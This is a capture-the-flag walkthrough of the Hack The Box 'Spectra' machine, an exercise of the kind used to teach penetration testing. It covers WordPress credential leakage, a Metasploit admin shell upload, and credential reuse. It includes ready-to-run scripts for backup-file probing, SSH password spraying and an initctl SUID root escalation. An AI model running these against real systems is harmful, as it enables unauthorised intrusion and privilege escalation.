• Donald Ashdown

Hack the Box - Spectra Walkthrough



Summary

Spectra is a great machine. The journey starts with WordPress vulnerabilities and a GUI dashboard; planting a reverse shell and then moving to SSH lets us compromise the host and upgrade to a proper shell. Lastly, root comes from checking our sudo run-as permissions and abusing a service-control binary to modify an active process.

Processes / Techniques
  • Dir busting

  • WP bruteforce

  • WP code injection

  • Unauthorized script injection

Tools Used
  • Nothing special


Enumeration

The original nmap scan showed absolutely no open ports, which might be a first for me.


Let's try a stealth scan as well, which sadly provides no new results. We are going to be enumerating blind.


Enumeration Website

Initially the website was returning a blank page and nothing was loading, which had me stumped until I recalled how much Hack The Box loves IP-to-hostname mapping as part of the experience. With that in mind I added the spectra.htb to IP mapping in /etc/hosts.


echo '10.129.144.226 spectra.htb' | sudo tee -a /etc/hosts


The "Software Issue Tracker" link takes us to the main page. The "Test" link, however, points at /testing/index.php. That looks out of place and gives us the opportunity to back up to the /testing/ directory and browse it on its own.



The entry that stands out the most in that directory is /wp-config.php.save. Browsing to it shows a blank page, but that is expected: the .save extension means the web server serves the file raw rather than through PHP, and the browser treats the <?php ... ?> block as markup and renders nothing. Checking the page source reveals the database settings:


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
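Leftover backups like wp-config.php.save are worth hunting for systematically rather than hoping a directory listing exposes them. The script below is an added example and not part of the original write-up: it generates the usual editor and backup variants of a file name and probes each one with curl, reporting anything that does not come back 404. The base URL and file name are passed as arguments; spectra.htb and /testing/ come from the write-up, the list of suffixes is my own.

```shell
#!/bin/sh
# Added example (not from the original write-up): generate the editor/backup
# leftovers that commonly sit beside a config file, then probe each with curl.
# Assumes curl is installed; the suffix list is an assumption, not exhaustive.

# Print the common backup/editor variants of a file name, one per line.
backup_candidates() {
    f=$1
    printf '%s\n' \
        "$f.save" "$f.bak" "$f.old" "$f.orig" \
        "$f.txt" "$f~" "$f.swp" ".$f.swp"
}

# Return the HTTP status code for a URL (000 when the request fails).
http_code() {
    curl -s -o /dev/null -w '%{http_code}' --max-time 10 -- "$1"
}

# Probe every candidate under a base URL and report anything that is not 404.
# A 200 means the raw file is served; a 403 still confirms the file exists.
probe_backups() {
    base=${1%/}   # e.g. http://spectra.htb/testing
    file=$2       # e.g. wp-config.php
    backup_candidates "$file" | while IFS= read -r cand; do
        code=$(http_code "$base/$cand")
        [ "$code" = "404" ] || printf '%s %s\n' "$code" "$base/$cand"
    done
}

# Usage: sh probe.sh http://spectra.htb/testing wp-config.php
if [ $# -eq 2 ]; then
    probe_backups "$1" "$2"
fi
```

Anything it reports should then be fetched and read as plain text (curl, not a browser), since the whole point is that the server does not execute it.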

SQL

Finding those SQL credentials is fantastic. However, we know from the initial enumeration that no open ports were found, so we have to resort to blind enumeration. I tried connecting to MySQL with them but it did not work, which suggests the server only listens locally.


WP-Login

As with all pentesting, check for the low-hanging fruit first: here that means trying the password we just recovered against wp-login.php.



From here we have several options.


  1. Inject code into theme templates

  2. Inject code into a plugin

I attempted to edit and inject a PHP reverse shell into the Hello Dolly plugin, however it was not executing for me.


I also attempted to upload a new plugin, but was not able to go down this route due to an error.


Twenty Twenty: 404 Template (404.php) - Editing this template and injecting code seemed like a good idea, but I kept receiving an error, as shown below.


Metasploit

Unfortunately I had to resort to Metasploit, as I could not find another way to pop a shell.


Module options (exploit/unix/webapp/wp_admin_shell_upload):

We use the administrator username here instead of the devtest username.


Moving Horizontally

The shell Metasploit provided was rather limited and not at all interactive, which left me specifying an absolute path for every command and slowed me down.



ls /opt/
VirtualBox
autologin.conf.orig
broadcom
displaylink
eeti
google
neverware
tpm1
tpm2


autologin.conf.orig stands out as not belonging in this location. Looking inside, the passwd variable is populated by reading a file under /etc/autologin:

  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done

Reading the passwd file under /etc/autologin turned over a password.


Moving to user

With this password in hand, the next step is to test it over SSH against every user found in /etc/passwd.
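The spray itself is easy to script. The block below is an added example, not part of the original write-up: it pulls the accounts with a real login shell out of a passwd-format file (copy the target's /etc/passwd out through the limited shell first) and tries the recovered password against each of them with sshpass. It assumes sshpass is installed locally and that the password is supplied through the PASS environment variable; the host name spectra.htb comes from the write-up.

```shell
#!/bin/sh
# Added example (not from the original write-up). Assumes sshpass is
# installed and the password is exported as PASS before running.

# Print login names whose shell is not a nologin/false shell.
# Reads a passwd-format file given as $1 (defaults to the local /etc/passwd).
login_users() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Try one user against the host non-interactively; print the user on success.
# Key auth is disabled so a hit means the password itself was accepted.
try_ssh() {
    user=$1 host=$2
    if SSHPASS=$PASS sshpass -e ssh \
        -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
        -o PreferredAuthentications=password -o PubkeyAuthentication=no \
        "$user@$host" true 2>/dev/null; then
        printf 'valid: %s@%s\n' "$user" "$host"
    fi
}

# Spray every login user from the passwd file against the host.
spray() {
    host=$1 passwd_file=$2
    login_users "$passwd_file" | while IFS= read -r u; do
        try_ssh "$u" "$host"
    done
}

# Usage: PASS='...' sh spray.sh spectra.htb ./target-passwd
if [ $# -eq 2 ]; then
    spray "$1" "$2"
fi
```

Filtering on the shell field keeps the attempt count down; system accounts with /usr/sbin/nologin can never log in over SSH, so trying them only makes noise in the target's auth log.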


Root

Checking what we can run with sudo (sudo -l) reveals that /sbin/initctl can be run as root.


Researching /sbin/initctl turned up a well-known privilege escalation technique. I have included the link below.


https://isharaabeythissa.medium.com/sudo-privileges-at-initctl-privileges-escalation-technique-ishara-abeythissa-c9d44ccadcb9



sudo -u root /sbin/initctl list

Great, we have confirmed we can execute initctl commands as root.

Just as the guide suggests, we browse to /etc/init, open the test job's definition (test.conf) with nano and add the following stanza to it.

script
	chmod +s /bin/bash
end script

sudo -u root /sbin/initctl start test

Once the job has run, /bin/bash carries the SUID bit. Start it with /bin/bash -p: without -p, bash notices that its effective uid differs from its real uid and drops the privilege again.


-bash-4.3$ whoami
root
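For reference, the whole initctl step as one script, with the checks a practitioner would want around it. This is an added example and not the guide's or the write-up's own code; it assumes the Upstart job is called test and lives in /etc/init/test.conf, that /etc/init is writable by our user, and that we may run /sbin/initctl as root via sudo, all as in the write-up. It is meant to be run on the target as the low-privileged user.

```shell
#!/bin/sh
# Added example (not from the original write-up). Assumes an Upstart job
# named test in /etc/init/test.conf and sudo rights on /sbin/initctl.

JOB=test
JOB_FILE=/etc/init/$JOB.conf
TARGET=/bin/bash

# The replacement job body: when started, mark $TARGET set-uid root.
job_definition() {
    cat <<EOF
description "test job rewritten to set the SUID bit"
script
    chmod +s $TARGET
end script
EOF
}

# True when the file carries the set-user-id bit (POSIX test -u).
has_setuid() {
    [ -u "$1" ]
}

escalate() {
    if has_setuid "$TARGET"; then
        echo "$TARGET is already set-uid"
    else
        # The write-up edits the job with nano; a redirect does the same.
        job_definition > "$JOB_FILE" || { echo "cannot write $JOB_FILE" >&2; exit 1; }
        # Stop first in case the job is already running, then start it as root.
        sudo -u root /sbin/initctl stop "$JOB" 2>/dev/null || true
        sudo -u root /sbin/initctl start "$JOB"
        # Verify before trusting it: if the bit is missing the job did not run.
        has_setuid "$TARGET" || { echo "SUID bit not set on $TARGET" >&2; exit 1; }
    fi
    # -p keeps the effective uid 0; without it bash drops back to our uid.
    exec "$TARGET" -p
}

# Usage: sh escalate.sh run
if [ "${1:-}" = "run" ]; then
    escalate
fi
```

The explicit has_setuid check is the part worth keeping: initctl start returns without error even when the script stanza fails, so confirming the bit on /bin/bash before exec'ing it saves a confusing dead end.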

